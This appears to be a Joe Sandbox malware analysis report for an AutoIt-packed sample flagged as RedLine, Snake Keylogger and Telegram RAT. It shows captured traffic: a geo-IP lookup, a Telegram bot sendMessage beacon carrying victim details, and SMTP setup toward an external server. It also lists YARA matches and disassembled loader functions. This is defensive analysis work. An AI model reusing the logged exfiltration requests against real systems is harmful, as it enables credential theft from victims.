2025-01-11 02:00:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49806	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:00:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:00:29 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875618 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uWeRF5rDGmK7SlWPj7PrNrrLHJ2HTPbZVYtYZNymavkadq9SEb8a6WMdBUZiwAvSfwPbdl40X9dMoS8kQN%2FB313Ntu%2FoQi8jgpogSxaj%2FWygbXWnuN2rczmcIdYwmxM9J0xiLQVG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001503d3d7a43ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1680&rtt_var=635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1714621&cwnd=228&unsent_bytes=0&cid=7b1060add0d9a9b7&ts=152&x=0"
2025-01-11 02:00:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49812	149.154.167.220	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:00:29 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2012/01/2025%20/%2014:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-11 02:00:29 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 02:00:29 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:00:29 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 11, 2025 03:00:36.432560921 CET	587	49853	166.62.28.135	192.168.2.5	220-sg2plzcpnl506897.prod.sin2.secureserver.net ESMTP Exim 4.96.2 #2 Fri, 10 Jan 2025 19:00:36 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 11, 2025 03:00:36.432832956 CET	49853	587	192.168.2.5	166.62.28.135	EHLO 549163
Jan 11, 2025 03:00:36.767278910 CET	587	49853	166.62.28.135	192.168.2.5	250-sg2plzcpnl506897.prod.sin2.secureserver.net Hello 549163 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 11, 2025 03:00:36.767575026 CET	49853	587	192.168.2.5	166.62.28.135	STARTTLS
Jan 11, 2025 03:00:37.100631952 CET	587	49853	166.62.28.135	192.168.2.5	220 TLS go ahead

Target ID:	0
Start time:	20:59:54
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\n0nsAzvYNd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\n0nsAzvYNd.exe"
Imagebase:	0x3a0000
File size:	1'163'264 bytes
MD5 hash:	3599E1D5D724FBB382A29F1CAD0AEDA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2054161886.0000000000340000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:59:55
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\n0nsAzvYNd.exe"
Imagebase:	0xc10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4511931022.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4516159706.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4516159706.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4513063241.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4513303031.0000000003080000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4518233311.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4513561000.000000000326A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4513561000.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	160

Executed Functions

Function 003A3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A3B68
IsDebuggerPresent.KERNEL32 ref: 003A3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,004652F8,004652E0,?,?), ref: 003A3BEB

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

Part of subcall function 003B092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003A3C14,004652F8,?,?,?), ref: 003B096E

SetCurrentDirectoryW.KERNEL32(?), ref: 003A3C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00457770,00000010), ref: 003DD281
SetCurrentDirectoryW.KERNEL32(?,004652F8,?,?,?), ref: 003DD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00454260,004652F8,?,?,?), ref: 003DD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 003DD346

Part of subcall function 003A3A46: GetSysColorBrush.USER32(0000000F), ref: 003A3A50
Part of subcall function 003A3A46: LoadCursorW.USER32(00000000,00007F00), ref: 003A3A5F
Part of subcall function 003A3A46: LoadIconW.USER32(00000063), ref: 003A3A76
Part of subcall function 003A3A46: LoadIconW.USER32(000000A4), ref: 003A3A88
Part of subcall function 003A3A46: LoadIconW.USER32(000000A2), ref: 003A3A9A
Part of subcall function 003A3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003A3AC0
Part of subcall function 003A3A46: RegisterClassExW.USER32(?), ref: 003A3B16

Part of subcall function 003A39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003A3A03
Part of subcall function 003A39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003A3A24
Part of subcall function 003A39D5: ShowWindow.USER32(00000000,?,?), ref: 003A3A38
Part of subcall function 003A39D5: ShowWindow.USER32(00000000,?,?), ref: 003A3A41

Part of subcall function 003A434A: _memset.LIBCMT ref: 003A4370
Part of subcall function 003A434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003A4415

Strings

This is a third-party compiled AutoIt script., xrefs: 003DD279
%C, xrefs: 003A3C44
runas, xrefs: 003DD33A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%C
API String ID: 529118366-1200935135
Opcode ID: 5a650017b7cddab27cfdcafcea912cec0a4af9aee71813881684a244ecdb3d13
Instruction ID: 1a7567519b22c256689afa68555822605fa9691fbb0811dc43135944ed207779
Opcode Fuzzy Hash: 5a650017b7cddab27cfdcafcea912cec0a4af9aee71813881684a244ecdb3d13
Instruction Fuzzy Hash: 91512931D08108AECF13EBB4EC55EED7B78EF46710F4041B6F451AA162EBB45645CB2A

Function 003A49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 003A49CD

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

GetCurrentProcess.KERNEL32(?,0042FAEC,00000000,00000000,?), ref: 003A4A9A
IsWow64Process.KERNEL32(00000000), ref: 003A4AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 003A4AE7
FreeLibrary.KERNEL32(00000000), ref: 003A4AF2
GetSystemInfo.KERNEL32(00000000), ref: 003A4B23
GetSystemInfo.KERNEL32(00000000), ref: 003A4B2F

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 52489faefef84fc15d36e405e90cd7600bc402e3ff5058f1b723665e4b3d244a
Instruction ID: 4e792f00bbc6914afe86da4c99d59ab702640d92d31c6dec60629969f2dc0c0b
Opcode Fuzzy Hash: 52489faefef84fc15d36e405e90cd7600bc402e3ff5058f1b723665e4b3d244a
Instruction Fuzzy Hash: 9691B3319897C0DAC733DB6895505AABFF5AF6A300F4449AED0CB93B42D260E908D76D

Function 003A4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003A4D8E,?,?,00000000,00000000), ref: 003A4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003A4D8E,?,?,00000000,00000000), ref: 003A4EB0
LoadResource.KERNEL32(?,00000000,?,?,003A4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003A4E2F), ref: 003DD937
SizeofResource.KERNEL32(?,00000000,?,?,003A4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003A4E2F), ref: 003DD94C
LockResource.KERNEL32(003A4D8E,?,?,003A4D8E,?,?,00000000,00000000,?,?,?,?,?,?,003A4E2F,00000000), ref: 003DD95F

Strings

SCRIPT, xrefs: 003A4EA6

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: c72091d04a2d1fd320cac212cec606f3bc921b93b44f167ec70ca94221f7cd10
Instruction ID: a0b6e15a573680e1b55de08492e28ce90b1f601885db262751de3bb7b263c059
Opcode Fuzzy Hash: c72091d04a2d1fd320cac212cec606f3bc921b93b44f167ec70ca94221f7cd10
Instruction Fuzzy Hash: CD115E75240700BFD7218B65EC48F677BBAFBC6B51F608278F40596250DBB2EC058675

Function 0040445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,003DE398), ref: 0040446A
FindFirstFileW.KERNELBASE(?,?), ref: 0040447B
FindClose.KERNEL32(00000000), ref: 0040448B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: a25efe20d06b1853ed0d9ff44cfd5ceac7916cf07338f3ef004b4220e448fcc0
Instruction ID: 593175ce6bf283c74c91e68496ee18efffca2db58c9030a18e97d7292873a393
Opcode Fuzzy Hash: a25efe20d06b1853ed0d9ff44cfd5ceac7916cf07338f3ef004b4220e448fcc0
Instruction Fuzzy Hash: 2EE0D872510500A78220AB78EC0D4EA776C9E46335F90077BFD35D11D0E7785D0595AE

Function 003B09D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B0A5B
timeGetTime.WINMM ref: 003B0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B0E53
Sleep.KERNEL32(0000000A), ref: 003B0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 003B0EFA
DestroyWindow.USER32 ref: 003B0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003B0F20
Sleep.KERNEL32(0000000A,?,?), ref: 003E4E83
TranslateMessage.USER32(?), ref: 003E5C60
DispatchMessageW.USER32(?), ref: 003E5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003E5C82

Strings

pbF, xrefs: 003E4FAE
pbF, xrefs: 003E57B4
@GUI_CTRLID, xrefs: 003E4F3A
@GUI_CTRLHANDLE, xrefs: 003E4FE4
pbF, xrefs: 003E4F59
@TRAY_ID, xrefs: 003E578F
pbF, xrefs: 003E5003
@GUI_WINHANDLE, xrefs: 003E4F8F
@COM_EVENTOBJ, xrefs: 003E54F0

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbF$pbF$pbF$pbF
API String ID: 4212290369-1168087579
Opcode ID: fcab424c7393a29dcf277dfefef32ea96bba57413c168fbe71e4e534d28e4072
Instruction ID: db46c592dbe1ed7a5ffa72ef21b66baad84b4326ded6978eff2eaa4be96d382a
Opcode Fuzzy Hash: fcab424c7393a29dcf277dfefef32ea96bba57413c168fbe71e4e534d28e4072
Instruction Fuzzy Hash: CAB2E370608781DFD72ADF25C884BABB7E4FF85308F144A2DE5499B6A1DB74E844CB42

Function 00409155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00408F5F: __time64.LIBCMT ref: 00408F69

Part of subcall function 003A4EE5: _fseek.LIBCMT ref: 003A4EFD

__wsplitpath.LIBCMT ref: 00409234

Part of subcall function 003C40FB: __wsplitpath_helper.LIBCMT ref: 003C413B

_wcscpy.LIBCMT ref: 00409247
_wcscat.LIBCMT ref: 0040925A
__wsplitpath.LIBCMT ref: 0040927F
_wcscat.LIBCMT ref: 00409295
_wcscat.LIBCMT ref: 004092A8

Part of subcall function 00408FA5: _memmove.LIBCMT ref: 00408FDE
Part of subcall function 00408FA5: _memmove.LIBCMT ref: 00408FED

_wcscmp.LIBCMT ref: 004091EF

Part of subcall function 00409734: _wcscmp.LIBCMT ref: 00409824
Part of subcall function 00409734: _wcscmp.LIBCMT ref: 00409837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00409452
_wcsncpy.LIBCMT ref: 004094C5
DeleteFileW.KERNEL32(?,?), ref: 004094FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00409511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00409522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00409534

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 5c15bcbb6a7da634a3883dab217515bec671ac61cd9d4fd4667c5612c11705d9
Instruction ID: 6bb051564252682ac34a8e994aa64177dbf002329cf05bb2597b339219c0143c
Opcode Fuzzy Hash: 5c15bcbb6a7da634a3883dab217515bec671ac61cd9d4fd4667c5612c11705d9
Instruction Fuzzy Hash: B1C13CB1900219AADF21DF95CC85EDEB7B9EF85300F0040AAF609E7192EB749E458F65

Function 003A3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 003A3074
RegisterClassExW.USER32(00000030), ref: 003A309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003A30AF
InitCommonControlsEx.COMCTL32(?), ref: 003A30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003A30DC
LoadIconW.USER32(000000A9), ref: 003A30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003A3101

Strings

0, xrefs: 003A3056
TaskbarCreated, xrefs: 003A30A4
AutoIt v3 GUI, xrefs: 003A3090
+, xrefs: 003A305D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

